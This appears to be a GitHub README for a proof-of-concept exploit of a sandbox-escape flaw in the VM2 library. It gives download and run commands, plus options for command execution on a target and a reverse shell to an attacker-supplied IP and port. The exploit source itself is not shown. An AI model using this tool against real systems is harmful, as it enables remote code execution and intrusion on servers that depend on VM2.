Skip to content

Latest commit

 

History

History
59 lines (38 loc) · 1.89 KB

README.md

File metadata and controls

59 lines (38 loc) · 1.89 KB

VM2 Exploit

PoC Exploit for VM2 Sandbox Escape Vulnerability - All Versions

VM2-Exploit.mp4

Description

Currently, the VM2 project has been discontinued. They released 65 versions, and all of its versions are vulnerable to command execution via sandbox escape.

Additional Notes

  • Note: This has been developed for easy and faster usage, so its usage might look different.
  • Provide either a URL or copy-paste the cURL request from your browser (recommended to use Firefox).
  • This will be using the Sandbox Escape in [email protected] via Promise[@@species] method.
  • If you haven't provided --ip and --port, the exploit will offer a terminal-like interface for executing commands on the target (though it's not a real interactive shell).
  • If your target's version is < 3.6.17 consider using this.
  • Feel free to contribute!

Usage

Setting Up

git clone https://github.com/rvizx/VM2-Exploit
cd VM2-Exploit
python3 exploit.py

or

wget https://raw.githubusercontent.com/rvizx/VM2-Exploit/main/exploit.py
python3 exploit.py

Usage

python3 exploit.py curl-command / target-url --additional-args

Additional Args:

--param    = parameter that contains the command (the first one will be selected as default if not provided.)
--ip       = your local IP for a reverse shell (--ip=12.24.34.3)
--port     = your local port for a reverse shell (--port=7777)
--base64   = if the payload is encoded with base64
--hex      = if the payload is encoded in hex

How to fix ?

  • consider migrating your code to isolated-vm

Credits

Xion (SeungHyun Lee) of KAIST Hacking Lab for disclosing these vulnerabilities and providing detailed analysis.